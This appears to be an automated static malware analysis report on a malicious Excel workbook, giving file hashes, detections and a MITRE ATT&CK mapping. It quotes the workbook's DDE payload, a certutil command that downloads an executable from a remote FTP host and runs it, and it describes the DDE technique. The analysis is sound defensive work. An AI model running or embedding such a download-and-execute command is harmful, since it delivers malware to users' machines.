Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 5f2facc59b3d9eb5…

MALICIOUS

Office (OOXML)

38.5 KB Created: 2020-12-24 11:15:18 UTC Authoring application: Microsoft Excel 14.0300 First seen: 2020-12-28
MD5: 7bed66d47f2a956814fec54c24130fea SHA-1: 4259e8f40cd6598f81040a26eaeb936fac0fb484 SHA-256: 5f2facc59b3d9eb556f9d94eaf62c54d1e0396d571187ed62be3cdff1d6dcfe7
120 Risk Score

Malware Insights

MITRE ATT&CK
T1203 Exploitation for Client Execution

The critical heuristic 'OOXML_SPREADSHEET_DDE_MALICIOUS' indicates a DDE link is present in the Excel file, specifically executing 'cmd /c certutil -urlcache -split -f ftp://qazwsx@the embedded link/dba.exe %APPDATA%\dba.exe & start %APPDATA%\dba.exe'. This command downloads 'dba.exe' from the specified FTP URL and then executes it. The ClamAV detection further confirms the malicious nature of the file.

Heuristics 2

  • ClamAV: Xml.Exploit.DDE_Abuse-9987933-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xml.Exploit.DDE_Abuse-9987933-1
  • Spreadsheet DDE link launches a dangerous command critical OOXML_SPREADSHEET_DDE_MALICIOUS
    Excel workbook contains an externalLinks/ddeLink entry whose ddeService/ddeTopic launches a dangerous executable. This is SpreadsheetML DDE command execution, distinct from WordprocessingML DDE field instructions.

Open this report in the interactive analyzer, or submit your own file for analysis.